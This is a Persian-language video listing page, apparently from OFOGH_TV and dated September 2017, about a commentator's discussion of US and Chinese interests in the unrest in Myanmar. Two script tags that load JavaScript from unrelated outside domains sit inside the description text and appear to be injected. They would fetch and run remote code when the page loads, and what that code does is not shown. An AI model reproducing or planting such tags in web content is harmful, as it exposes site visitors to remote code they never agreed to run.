نا آرامی در میانمار به نفع کیست؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مهدی عوض زاده در #جهان_آرا شرح می دهد که #آمریکا و #چین چه منافعی در #میانمار دارند و ناآرامی به نفع کیست.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0
ارسال در 1396/6/20 ساعت 12:12 2017-9-11 12:12:05
OFOGH_TV
توسط OFOGH_TV


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر